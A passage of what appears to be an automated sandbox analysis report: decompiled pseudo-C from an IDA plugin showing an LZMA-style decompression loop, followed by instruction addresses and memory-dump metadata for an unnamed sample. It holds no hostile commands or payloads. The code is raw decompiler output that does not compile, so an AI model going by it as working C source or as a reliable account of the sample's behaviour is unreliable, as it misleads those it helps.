                                                                                                                                                                                                                            													while(1) {
                                                                                                                                                                                                                            														 *(_t613 - 0x88) = _t533;
                                                                                                                                                                                                                            														goto L1;
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x50);
                                                                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                                            												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                                                                                                                                                            													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                                                                                            													 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                                            													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                                                                                                                                                            														__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                                                                                            														__ebx = __ebx | 0x00000001;
                                                                                                                                                                                                                            														__eflags = __ebx;
                                                                                                                                                                                                                            														 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            														L101:
                                                                                                                                                                                                                            														_t338 = __ebp - 0x48;
                                                                                                                                                                                                                            														 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                                                                                                                                                            														__eflags =  *_t338;
                                                                                                                                                                                                                            														goto L102;
                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                            														goto L99;
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__edx =  *(__ebp - 4);
                                                                                                                                                                                                                            												__eax = __eax - __ebx;
                                                                                                                                                                                                                            												 *(__ebp - 0x40) = __ecx;
                                                                                                                                                                                                                            												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                                                                                                                                                            												goto L108;
                                                                                                                                                                                                                            											case 0x1a:
                                                                                                                                                                                                                            												L56:
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x64);
                                                                                                                                                                                                                            												if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                                                                            													 *(__ebp - 0x88) = 0x1a;
                                                                                                                                                                                                                            													goto L170;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x68);
                                                                                                                                                                                                                            												__al =  *(__ebp - 0x5c);
                                                                                                                                                                                                                            												__edx =  *(__ebp - 8);
                                                                                                                                                                                                                            												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                                                                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                                                                            												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                                                                                            												 *( *(__ebp - 0x68)) = __al;
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x14);
                                                                                                                                                                                                                            												 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                                                                                                                                                            												__eax = __ecx + 1;
                                                                                                                                                                                                                            												__edx = 0;
                                                                                                                                                                                                                            												_t192 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                                                                            												__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                                                                            												__edx = _t192;
                                                                                                                                                                                                                            												goto L80;
                                                                                                                                                                                                                            											case 0x1b:
                                                                                                                                                                                                                            												L76:
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x64);
                                                                                                                                                                                                                            												if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                                                                            													 *(__ebp - 0x88) = 0x1b;
                                                                                                                                                                                                                            													goto L170;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                                                            												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                                                                            												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                                                            													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                                                            													__eflags = __eax;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__edx =  *(__ebp - 8);
                                                                                                                                                                                                                            												__cl =  *(__eax + __edx);
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                                            												 *(__ebp - 0x5c) = __cl;
                                                                                                                                                                                                                            												 *(__eax + __edx) = __cl;
                                                                                                                                                                                                                            												__eax = __eax + 1;
                                                                                                                                                                                                                            												__edx = 0;
                                                                                                                                                                                                                            												_t275 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                                                                            												__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                                                                            												__edx = _t275;
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x68);
                                                                                                                                                                                                                            												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                                                                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                                                                            												_t284 = __ebp - 0x64;
                                                                                                                                                                                                                            												 *_t284 =  *(__ebp - 0x64) - 1;
                                                                                                                                                                                                                            												__eflags =  *_t284;
                                                                                                                                                                                                                            												 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                                                                                            												L80:
                                                                                                                                                                                                                            												 *(__ebp - 0x14) = __edx;
                                                                                                                                                                                                                            												goto L81;
                                                                                                                                                                                                                            											case 0x1c:
                                                                                                                                                                                                                            												while(1) {
                                                                                                                                                                                                                            													L123:
                                                                                                                                                                                                                            													__eflags =  *(__ebp - 0x64);
                                                                                                                                                                                                                            													if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                                                                            														break;
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            													__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                                            													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                                                            													__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                                                                            													if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                                                            														__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                                                            														__eflags = __eax;
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            													__edx =  *(__ebp - 8);
                                                                                                                                                                                                                            													__cl =  *(__eax + __edx);
                                                                                                                                                                                                                            													__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                                            													 *(__ebp - 0x5c) = __cl;
                                                                                                                                                                                                                            													 *(__eax + __edx) = __cl;
                                                                                                                                                                                                                            													__eax = __eax + 1;
                                                                                                                                                                                                                            													__edx = 0;
                                                                                                                                                                                                                            													_t414 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                                                                            													__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                                                                            													__edx = _t414;
                                                                                                                                                                                                                            													__eax =  *(__ebp - 0x68);
                                                                                                                                                                                                                            													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                                                                            													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                                                                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                                                                                                                                                            													__eflags =  *(__ebp - 0x30);
                                                                                                                                                                                                                            													 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                                                                                            													 *(__ebp - 0x14) = _t414;
                                                                                                                                                                                                                            													if( *(__ebp - 0x30) > 0) {
                                                                                                                                                                                                                            														continue;
                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                            														L81:
                                                                                                                                                                                                                            														 *(__ebp - 0x88) = 2;
                                                                                                                                                                                                                            														goto L1;
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												 *(__ebp - 0x88) = 0x1c;
                                                                                                                                                                                                                            												goto L170;
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									L171:
                                                                                                                                                                                                                            									_t535 = _t534 | 0xffffffff;
                                                                                                                                                                                                                            									goto L172;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L1;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                            0x00406cc4
                                                                                                                                                                                                                            0x00406cc8
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406cca
                                                                                                                                                                                                                            0x00406cd0
                                                                                                                                                                                                                            0x00406cfa
                                                                                                                                                                                                                            0x00406d00
                                                                                                                                                                                                                            0x00406d07
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406d07
                                                                                                                                                                                                                            0x00406cd6
                                                                                                                                                                                                                            0x00406cd9
                                                                                                                                                                                                                            0x00406cde
                                                                                                                                                                                                                            0x00406cde
                                                                                                                                                                                                                            0x00406ce9
                                                                                                                                                                                                                            0x00406cf1
                                                                                                                                                                                                                            0x00406cf4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406d39
                                                                                                                                                                                                                            0x00406d3f
                                                                                                                                                                                                                            0x00406d42
                                                                                                                                                                                                                            0x00406d4f
                                                                                                                                                                                                                            0x00406d57
                                                                                                                                                                                                                            0x004073cb
                                                                                                                                                                                                                            0x004073cb
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406d0e
                                                                                                                                                                                                                            0x00406d0e
                                                                                                                                                                                                                            0x00406d12
                                                                                                                                                                                                                            0x0040755d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040755d
                                                                                                                                                                                                                            0x00406d1e
                                                                                                                                                                                                                            0x00406d29
                                                                                                                                                                                                                            0x00406d29
                                                                                                                                                                                                                            0x00406d29
                                                                                                                                                                                                                            0x00406d2c
                                                                                                                                                                                                                            0x00406d2f
                                                                                                                                                                                                                            0x00406d32
                                                                                                                                                                                                                            0x00406d37
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004073ce
                                                                                                                                                                                                                            0x004073ce
                                                                                                                                                                                                                            0x004073d4
                                                                                                                                                                                                                            0x004073da
                                                                                                                                                                                                                            0x004073e0
                                                                                                                                                                                                                            0x004073fa
                                                                                                                                                                                                                            0x004073fd
                                                                                                                                                                                                                            0x00407403
                                                                                                                                                                                                                            0x0040740e
                                                                                                                                                                                                                            0x00407410
                                                                                                                                                                                                                            0x004073e2
                                                                                                                                                                                                                            0x004073e2
                                                                                                                                                                                                                            0x004073f1
                                                                                                                                                                                                                            0x004073f5
                                                                                                                                                                                                                            0x004073f5
                                                                                                                                                                                                                            0x0040741a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406d5f
                                                                                                                                                                                                                            0x00406d61
                                                                                                                                                                                                                            0x00406d64
                                                                                                                                                                                                                            0x00406dd5
                                                                                                                                                                                                                            0x00406dd8
                                                                                                                                                                                                                            0x00406ddb
                                                                                                                                                                                                                            0x00406de2
                                                                                                                                                                                                                            0x00406dec
                                                                                                                                                                                                                            0x004073cb
                                                                                                                                                                                                                            0x004073cb
                                                                                                                                                                                                                            0x004073cb
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004073cb
                                                                                                                                                                                                                            0x004073cb
                                                                                                                                                                                                                            0x00406d66
                                                                                                                                                                                                                            0x00406d6a
                                                                                                                                                                                                                            0x00406d6d
                                                                                                                                                                                                                            0x00406d6f
                                                                                                                                                                                                                            0x00406d72
                                                                                                                                                                                                                            0x00406d75
                                                                                                                                                                                                                            0x00406d77
                                                                                                                                                                                                                            0x00406d7a
                                                                                                                                                                                                                            0x00406d7c
                                                                                                                                                                                                                            0x00406d81
                                                                                                                                                                                                                            0x00406d84
                                                                                                                                                                                                                            0x00406d87
                                                                                                                                                                                                                            0x00406d8b
                                                                                                                                                                                                                            0x00406d92
                                                                                                                                                                                                                            0x00406d95
                                                                                                                                                                                                                            0x00406d9c
                                                                                                                                                                                                                            0x00406da0
                                                                                                                                                                                                                            0x00406da8
                                                                                                                                                                                                                            0x00406da8
                                                                                                                                                                                                                            0x00406da8
                                                                                                                                                                                                                            0x00406da2
                                                                                                                                                                                                                            0x00406da2
                                                                                                                                                                                                                            0x00406da2
                                                                                                                                                                                                                            0x00406d97
                                                                                                                                                                                                                            0x00406d97
                                                                                                                                                                                                                            0x00406d97
                                                                                                                                                                                                                            0x00406dac
                                                                                                                                                                                                                            0x00406daf
                                                                                                                                                                                                                            0x00406dcd
                                                                                                                                                                                                                            0x00406dcf
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406db1
                                                                                                                                                                                                                            0x00406db1
                                                                                                                                                                                                                            0x00406db4
                                                                                                                                                                                                                            0x00406db7
                                                                                                                                                                                                                            0x00406dba
                                                                                                                                                                                                                            0x00406e88
                                                                                                                                                                                                                            0x00406e8f
                                                                                                                                                                                                                            0x00406e93
                                                                                                                                                                                                                            0x00406e95
                                                                                                                                                                                                                            0x00406e99
                                                                                                                                                                                                                            0x00406e65
                                                                                                                                                                                                                            0x00406e65
                                                                                                                                                                                                                            0x00406e69
                                                                                                                                                                                                                            0x00406e71
                                                                                                                                                                                                                            0x00406e76
                                                                                                                                                                                                                            0x00406e78
                                                                                                                                                                                                                            0x00406e7a
                                                                                                                                                                                                                            0x00406e7a
                                                                                                                                                                                                                            0x00406e9c
                                                                                                                                                                                                                            0x00406ea3
                                                                                                                                                                                                                            0x00406ea6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406eac
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406eac
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406eb1
                                                                                                                                                                                                                            0x00406eb1
                                                                                                                                                                                                                            0x00406eb5
                                                                                                                                                                                                                            0x00407575
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407575
                                                                                                                                                                                                                            0x00406ebb
                                                                                                                                                                                                                            0x00406ebe
                                                                                                                                                                                                                            0x00406ec1
                                                                                                                                                                                                                            0x00406ec5
                                                                                                                                                                                                                            0x00406ec8
                                                                                                                                                                                                                            0x00406ece
                                                                                                                                                                                                                            0x00406ed0
                                                                                                                                                                                                                            0x00406ed0
                                                                                                                                                                                                                            0x00406ed0
                                                                                                                                                                                                                            0x00406ed3
                                                                                                                                                                                                                            0x00406ed6
                                                                                                                                                                                                                            0x00406ed6
                                                                                                                                                                                                                            0x00406ed6
                                                                                                                                                                                                                            0x00406edc
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406ede
                                                                                                                                                                                                                            0x00406ee1
                                                                                                                                                                                                                            0x00406ee4
                                                                                                                                                                                                                            0x00406ee7
                                                                                                                                                                                                                            0x00406eea
                                                                                                                                                                                                                            0x00406eed
                                                                                                                                                                                                                            0x00406ef0
                                                                                                                                                                                                                            0x00406ef3
                                                                                                                                                                                                                            0x00406ef6
                                                                                                                                                                                                                            0x00406ef9
                                                                                                                                                                                                                            0x00406efc
                                                                                                                                                                                                                            0x00406f14
                                                                                                                                                                                                                            0x00406f17
                                                                                                                                                                                                                            0x00406f1a
                                                                                                                                                                                                                            0x00406f1d
                                                                                                                                                                                                                            0x00406f1d
                                                                                                                                                                                                                            0x00406f20
                                                                                                                                                                                                                            0x00406f24
                                                                                                                                                                                                                            0x00406f26
                                                                                                                                                                                                                            0x00406efe
                                                                                                                                                                                                                            0x00406efe
                                                                                                                                                                                                                            0x00406f06
                                                                                                                                                                                                                            0x00406f0b
                                                                                                                                                                                                                            0x00406f0d
                                                                                                                                                                                                                            0x00406f0f
                                                                                                                                                                                                                            0x00406f0f
                                                                                                                                                                                                                            0x00406f29
                                                                                                                                                                                                                            0x00406f30
                                                                                                                                                                                                                            0x00406f33
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406f35
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406f35
                                                                                                                                                                                                                            0x00406f33
                                                                                                                                                                                                                            0x00406f3a
                                                                                                                                                                                                                            0x00406f3a
                                                                                                                                                                                                                            0x00406f3a
                                                                                                                                                                                                                            0x00406f3a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406f75
                                                                                                                                                                                                                            0x00406f75
                                                                                                                                                                                                                            0x00406f79
                                                                                                                                                                                                                            0x00407581
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407581
                                                                                                                                                                                                                            0x00406f7f
                                                                                                                                                                                                                            0x00406f82
                                                                                                                                                                                                                            0x00406f85
                                                                                                                                                                                                                            0x00406f89
                                                                                                                                                                                                                            0x00406f8c
                                                                                                                                                                                                                            0x00406f92
                                                                                                                                                                                                                            0x00406f94
                                                                                                                                                                                                                            0x00406f94
                                                                                                                                                                                                                            0x00406f94
                                                                                                                                                                                                                            0x00406f97
                                                                                                                                                                                                                            0x00406f9a
                                                                                                                                                                                                                            0x00406f9a
                                                                                                                                                                                                                            0x00406fa0
                                                                                                                                                                                                                            0x00406f3e
                                                                                                                                                                                                                            0x00406f3e
                                                                                                                                                                                                                            0x00406f41
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406f41
                                                                                                                                                                                                                            0x00406fa2
                                                                                                                                                                                                                            0x00406fa2
                                                                                                                                                                                                                            0x00406fa5
                                                                                                                                                                                                                            0x00406fa8
                                                                                                                                                                                                                            0x00406fab
                                                                                                                                                                                                                            0x00406fae
                                                                                                                                                                                                                            0x00406fb1
                                                                                                                                                                                                                            0x00406fb4
                                                                                                                                                                                                                            0x00406fb7
                                                                                                                                                                                                                            0x00406fba
                                                                                                                                                                                                                            0x00406fbd
                                                                                                                                                                                                                            0x00406fc0
                                                                                                                                                                                                                            0x00406fd8
                                                                                                                                                                                                                            0x00406fdb
                                                                                                                                                                                                                            0x004074eb
                                                                                                                                                                                                                            0x004074ee
                                                                                                                                                                                                                            0x00407507
                                                                                                                                                                                                                            0x0040750a
                                                                                                                                                                                                                            0x0040750d
                                                                                                                                                                                                                            0x00407510
                                                                                                                                                                                                                            0x00407514
                                                                                                                                                                                                                            0x00407516
                                                                                                                                                                                                                            0x00407516
                                                                                                                                                                                                                            0x00407517
                                                                                                                                                                                                                            0x0040751a
                                                                                                                                                                                                                            0x004074f0
                                                                                                                                                                                                                            0x004074f0
                                                                                                                                                                                                                            0x004074f8
                                                                                                                                                                                                                            0x004074fd
                                                                                                                                                                                                                            0x004074ff
                                                                                                                                                                                                                            0x00407502
                                                                                                                                                                                                                            0x00407502
                                                                                                                                                                                                                            0x0040751d
                                                                                                                                                                                                                            0x00407524
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407526
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407526
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004071c2
                                                                                                                                                                                                                            0x004071c5
                                                                                                                                                                                                                            0x004071fb
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732e
                                                                                                                                                                                                                            0x0040732e
                                                                                                                                                                                                                            0x00407331
                                                                                                                                                                                                                            0x00407333
                                                                                                                                                                                                                            0x004075bd
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004075bd
                                                                                                                                                                                                                            0x00407339
                                                                                                                                                                                                                            0x0040733c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407342
                                                                                                                                                                                                                            0x00407346
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x004071c7
                                                                                                                                                                                                                            0x004071c9
                                                                                                                                                                                                                            0x004071cb
                                                                                                                                                                                                                            0x004071cd
                                                                                                                                                                                                                            0x004071d0
                                                                                                                                                                                                                            0x004071d1
                                                                                                                                                                                                                            0x004071d3
                                                                                                                                                                                                                            0x004071d5
                                                                                                                                                                                                                            0x004071d8
                                                                                                                                                                                                                            0x004071db
                                                                                                                                                                                                                            0x004071f1
                                                                                                                                                                                                                            0x004071f6
                                                                                                                                                                                                                            0x0040722e
                                                                                                                                                                                                                            0x0040722e
                                                                                                                                                                                                                            0x00407232
                                                                                                                                                                                                                            0x0040725e
                                                                                                                                                                                                                            0x00407260
                                                                                                                                                                                                                            0x00407267
                                                                                                                                                                                                                            0x0040726a
                                                                                                                                                                                                                            0x0040726d
                                                                                                                                                                                                                            0x0040726d
                                                                                                                                                                                                                            0x00407272
                                                                                                                                                                                                                            0x00407272
                                                                                                                                                                                                                            0x00407274
                                                                                                                                                                                                                            0x00407277
                                                                                                                                                                                                                            0x0040727e
                                                                                                                                                                                                                            0x00407281
                                                                                                                                                                                                                            0x004072ae
                                                                                                                                                                                                                            0x004072ae
                                                                                                                                                                                                                            0x004072b1
                                                                                                                                                                                                                            0x004072b4
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x004072b6
                                                                                                                                                                                                                            0x004072bc
                                                                                                                                                                                                                            0x004072bf
                                                                                                                                                                                                                            0x004072c2
                                                                                                                                                                                                                            0x004072c5
                                                                                                                                                                                                                            0x004072c8
                                                                                                                                                                                                                            0x004072cb
                                                                                                                                                                                                                            0x004072ce
                                                                                                                                                                                                                            0x004072d1
                                                                                                                                                                                                                            0x004072d4
                                                                                                                                                                                                                            0x004072d7
                                                                                                                                                                                                                            0x004072f0
                                                                                                                                                                                                                            0x004072f2
                                                                                                                                                                                                                            0x004072f5
                                                                                                                                                                                                                            0x004072f6
                                                                                                                                                                                                                            0x004072f9
                                                                                                                                                                                                                            0x004072fb
                                                                                                                                                                                                                            0x004072fe
                                                                                                                                                                                                                            0x00407300
                                                                                                                                                                                                                            0x00407302
                                                                                                                                                                                                                            0x00407305
                                                                                                                                                                                                                            0x00407307
                                                                                                                                                                                                                            0x0040730a
                                                                                                                                                                                                                            0x0040730e
                                                                                                                                                                                                                            0x00407310
                                                                                                                                                                                                                            0x00407310
                                                                                                                                                                                                                            0x00407311
                                                                                                                                                                                                                            0x00407314
                                                                                                                                                                                                                            0x00407317
                                                                                                                                                                                                                            0x004072d9
                                                                                                                                                                                                                            0x004072d9
                                                                                                                                                                                                                            0x004072e1
                                                                                                                                                                                                                            0x004072e6
                                                                                                                                                                                                                            0x004072e8
                                                                                                                                                                                                                            0x004072eb

                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
